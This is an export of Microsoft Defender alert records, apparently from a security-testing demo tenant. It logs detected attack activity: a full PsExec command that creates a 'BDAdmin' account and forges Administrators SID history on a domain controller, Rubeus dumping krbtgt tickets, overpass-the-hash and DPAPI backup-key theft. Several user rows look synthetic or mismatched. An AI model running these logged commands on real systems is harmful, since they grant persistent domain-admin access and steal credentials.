"processCommandLine": "\"cmd\" /c \"net.exe user /add BDAdmin Password1! && net.exe stop ntds /y && powershell.exe -Command \"Add-ADDBSidHistory -SamAccountName BDAdmin -SidHistory \\\"S-1-5-32-544\\\" -DatabasePath (Get-ItemProperty -Path Registry::HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters).\\\"DSA Database file\\\"\" && net.exe start ntds\"",
"processCreationTime": "2022-11-21T02:34:15.4789089Z",
"processId": 4960,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "ded8fd7f36417f66eb6ada10e0c0d7c0022986e9",
"sha256": "bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527",
"url": null,
"userPrincipalName": "steve@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1107",
"verdict": "Suspicious"
},
{
"aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09",
"accountName": "steve",
"detectionStatus": "Detected",
"deviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:36:07.05Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:34:15.4789089Z",
"parentProcessFileName": "cmd.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 4960,
"processCommandLine": "net.exe user /add BDAdmin Password1! ",
"processCreationTime": "2022-11-21T02:34:15.5232143Z",
"processId": 6372,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "steve@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1107",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-11T08:19:04.5766667Z | Suspicious | None | bob | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-21T02:04:30.4666667Z | Suspicious | None | analyst | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1111 | 89b6fc86-af84-47b2-a72d-325362598b2c | ronhd@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-18T05:12:05.5433333Z | Suspicious | Active | ronhd | MSDXV2 | S-1-5-21-2300221942-1987151257-321556088-1111 | 89b6fc86-af84-47b2-a72d-325362598b2c | ronhd@msdxv2.m365dpoc.com | fc870d086c53ded2e94300f7569aa9478186f2c7 | a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1 | Rubeus.exe | C:\Temp | 6,712 | powershell -enc ZABpAHIA | 2022-11-18T05:10:14.9715084Z | 8,784 | 2022-11-18T05:10:14.9168031Z | cmd.exe | C:\Windows\System32 | Detected | 36150b3c1b69b5c2da9df4efd86ac6c166924a48 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-12T09:10:20.9033333Z | Suspicious | None | admin | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-11T15:04:40.1533333Z | Malicious | None | msftadmin | null | S-1-12-1-2269820315-1261997569-3294602117-2733835123 | 874ab59b-8e01-4b38-85a3-5fc47303f3a2 | msftadmin@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-12-22T08:59:39.6033333Z | Suspicious | None | steve | MSDXV8 | S-1-5-21-2159906967-4174806019-1002223092-1107 | null | steve@msdxv8.m365dpoc.com | 6cbce4a295c163791b60fc23d285e6d84f28ee4c | de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | 7,052 | cmd.exe /c whoami | 2022-12-22T08:48:41.0981025Z | 3,032 | 2022-12-22T08:48:18.0279285Z | cmd.exe | C:\Windows\System32 | Detected | 3ad3fb0567038c2ec2e59e76690c2e6c01253af9 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-14T17:23:28.5433333Z | Suspicious | None | darol | corp.local | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-13T17:25:57.07Z | Suspicious | None | user1 | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638072958478304122_-1638737952 | fad7cdd3-8d17-4a8f-bae5-129fc37a24fc | 975 | MicrosoftDefenderForEndpoint | 2022-12-22T08:50:47.8304325Z | 2022-12-22T08:51:24.2333333Z | null | 2022-12-22T08:47:28.9843705Z | 2022-12-22T08:48:15.5042519Z | PsExec launched a command on a remote device | PsExec was used to launch a command on a remote device. PsExec is a tool used to launch programs on remote, or local devices. An attacker might be leveraging this tool to launch malicious commands to a remote device and move laterally in the organization. | LateralMovement | New | Medium | null | UnsupportedAlertType | null | null | WindowsDefenderAtp | 40eca4c4-8854-418a-8024-fff7c9d7b077 | null | null | null | [
"T1021",
"T1021.002",
"T1569.002"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "lab.net",
"firstSeen": "2022-12-08T05:21:19.944Z",
"healthStatus": "Inactive",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV8"
}
],
"mdatpDeviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "High",
"tags": [],
"version": "1809",
"vmMetadata": null
}
] | [
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV8",
"entityType": "User",
"evidenceCreationTime": "2022-12-22T08:50:47.8466667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:50:47.8466667Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": "\"powershell.exe\" -noexit -command Set-Location -literalPath 'C:\\Users\\jeff\\Desktop'",
"processCreationTime": "2022-12-22T08:47:11.8139068Z",
"processId": 6324,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:50:47.8466667Z",
"fileName": "PsExec.exe",
"filePath": "C:\\M365DAttack\\PsTools",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T08:47:11.8139068Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 6324,
"processCommandLine": "\"PsExec.exe\" \\\\msdxv8-dc -accepteula cmd /c \"net.exe user /add BDAdmin Password1! && net.exe stop ntds /y && powershell.exe -Command \"Add-ADDBSidHistory -SamAccountName BDAdmin -SidHistory \\\"S-1-5-32-544\\\" -DatabasePath (Get-ItemProperty -Path Registry::HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters).\\\"DSA Database file\\\"\" && net.exe start ntds\"",
"processCreationTime": "2022-12-22T08:47:53.911074Z",
"processId": 11132,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:51:24.16Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": "powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1",
"processCreationTime": "2022-12-22T08:47:29.1097133Z",
"processId": 6584,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:51:24.16Z",
"fileName": "PsExec.exe",
"filePath": "C:\\M365DAttack\\PsTools",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T08:47:29.1097133Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 6584,
"processCommandLine": "\"PsExec.exe\" \\\\msdxv8-win10b -accepteula cmd /c \"C:\\Temp\\Rubeus.exe dump /service:krbtgt /user:steve > C:\\Temp\\AdminTicket.txt\"",
"processCreationTime": "2022-12-22T08:47:29.7154534Z",
"processId": 3956,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-21T04:54:50.71Z | Suspicious | None | svc_acct | MSDXV8 | S-1-5-21-2159906967-4174806019-1002223092-1107 | null | steve@msdxv8.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-22T08:59:19.3833333Z | Suspicious | None | jeff | staging.net | S-1-5-21-2159906967-4174806019-1002223092-1104 | null | jeff@msdxv8.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638045938689134121_-241615733 | da638045938689134121_-241615733 | 765 | MicrosoftDefenderForEndpoint | 2022-11-21T02:17:48.91351Z | 2022-11-21T02:19:23.2233333Z | null | 2022-11-21T02:04:18.4087694Z | 2022-11-21T02:04:18.4088127Z | Successful logon using overpass-the-hash with potentially stolen credentials | An attacker accessed a resource with credentials that might have been obtained using an overpass-the-hash attack. An overpass-the-hash attack typically involves obtaining a password hash from memory and then using the hash to obtain a Kerberos ticket. The ticket is then used to authenticate to network resources. | LateralMovement | New | Medium | null | UnsupportedAlertType | null | null | MTP | 9bd9c53d-2d3a-4af1-8c6d-a1d33ec33ede | null | null | null | [
"T1550.002",
"T1550.003"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "NotSupported",
"deviceDnsName": "vpn.zone",
"firstSeen": "2022-08-08T08:27:58.906Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "Defender",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "WindowsServer2019",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "High",
"tags": [],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-DC",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "5bc68ee9-2aaf-4b12-8045-60af8aecad6e"
}
}
] | [
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:17:48.9433333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": "0001-01-01T00:00:00Z",
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": 0,
"processCommandLine": "",
"processCreationTime": "0001-01-01T00:00:00Z",
"processId": 0,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c",
"accountName": "ronhd",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:17:48.9433333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "ronhd@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1111",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Ip",
"evidenceCreationTime": "2022-11-21T02:17:48.9433333Z",
"fileName": null,
"filePath": null,
"ipAddress": "10.0.0.9",
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "system",
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:17:49.0366667Z",
"fileName": "lsass.exe",
"filePath": "",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-10T17:17:05.8533724Z",
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": 576,
"processCommandLine": "lsass.exe",
"processCreationTime": "2022-11-10T17:17:06.0517668Z",
"processId": 688,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "cb9a0740d4e6270f032b289f41bf152a813bba9a",
"sha256": "6cfff639a6c9d8a9fbc6d1df8c239e089a505ac8ae6aceed422bd3dd94be16dc",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-21T02:17:49.0366667Z",
"fileName": "lsass.exe",
"filePath": "",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "cb9a0740d4e6270f032b289f41bf152a813bba9a",
"sha256": "6cfff639a6c9d8a9fbc6d1df8c239e089a505ac8ae6aceed422bd3dd94be16dc",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "system",
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:17:49.0366667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-11T08:28:43.58Z | Malicious | None | ronhd | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1111 | 89b6fc86-af84-47b2-a72d-325362598b2c | ronhd@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
aab82c6269-6067-4e63-b900-403ae87aa3ea | b82c6269-6067-4e63-b900-403ae87aa3ea | 765 | MicrosoftDefenderForIdentity | 2022-11-21T02:12:59.7139959Z | 2022-11-21T02:22:39.76Z | null | 2022-11-21T02:06:50.40388Z | 2022-11-21T02:15:06.152131Z | Malicious request of Data Protection API (DPAPI) master key | Steve Lewis (IT director) on MSDXV2-Win10V successfully obtained the DPAPI domain backup key from MSDXV2-DC. | CredentialAccess | New | High | null | UnsupportedAlertType | null | null | AzureATP | RetrieveDataProtectionBackupKeySecurityAlert | null | null | null | [
"T1555",
"T1555.003"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "NotSupported",
"deviceDnsName": "msdxv2-dc.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:27:58.906Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "WindowsServer2019",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "Critical",
"tags": [],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-DC",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "5bc68ee9-2aaf-4b12-8045-60af8aecad6e"
}
},
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "Critical",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] | [
{
"aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09",
"accountName": "steve",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:22:39.7433333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "steve@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1107",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-12T13:26:39.0533333Z | Suspicious | None | root | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-11T08:19:39.2166667Z | Suspicious | None | hacker | NT AUTHORITY | S-1-5-18 | null | null | ed5324a2b10ad1342da6332982e4c8ec4c3cd096 | fc4864065d84ccb4c855f4c47afa318113c1ba81e105c2ca0a8a33b51fe72299 | ntoskrnl.exe | C:\Windows\System32 | 4 | null | 2022-11-11T08:13:24.9197363Z | null | null | null | null | Detected | 36150b3c1b69b5c2da9df4efd86ac6c166924a48 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-09-30T06:16:02.3033333Z | Suspicious | None | operator | MSDXV2 | S-1-5-21-2300221942-1987151257-321556088-1111 | 89b6fc86-af84-47b2-a72d-325362598b2c | ronhd@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-14T17:09:16.3333333Z | Suspicious | None | alice | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-14T07:37:49.3133333Z | Suspicious | None | darol | corp.local | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-09-30T06:14:46.24Z | Suspicious | None | jeff | malicious.io | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-09-30T06:13:51.0033333Z | Suspicious | None | jeff | corp.local | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638001153597169045_2028162301 | 1ca6bb66-8dd3-44e7-9b9f-26d4c4954f41 | 486 | MicrosoftDefenderForEndpoint | 2022-09-30T06:15:59.7169263Z | 2022-11-19T01:35:42.7033333Z | 2022-10-01T01:36:00.5066667Z | 2022-09-30T06:13:29.3651096Z | 2022-09-30T06:13:29.3651096Z | Suspicious account creation | A new user account was created. A new user account can be created to establish a secondary of backup access to the device or services within the organization. An attacker might be attempting to maintain access to the device or organization. | Persistence | Resolved | Medium | null | UnsupportedAlertType | TruePositive | SecurityTesting | WindowsDefenderAtp | b0c31f72-1d80-458a-8ceb-5bc7bbcbd30a | msftadmin@msdxv2.m365dpoc.com | null | null | [
"T1136",
"T1136.001"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "NotSupported",
"deviceDnsName": "msdxv2-dc.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:27:58.906Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "defender",
"domainName": "MSDXV2"
},
{
"accountName": "msdefender",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "WindowsServer2019",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "Low",
"tags": [],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-DC",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "5bc68ee9-2aaf-4b12-8045-60af8aecad6e"
}
}
] | [
{
"aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09",
"accountName": "steve",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-09-30T06:15:59.7633333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "steve@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1107",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-13T19:22:30.7466667Z | Suspicious | None | guest | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
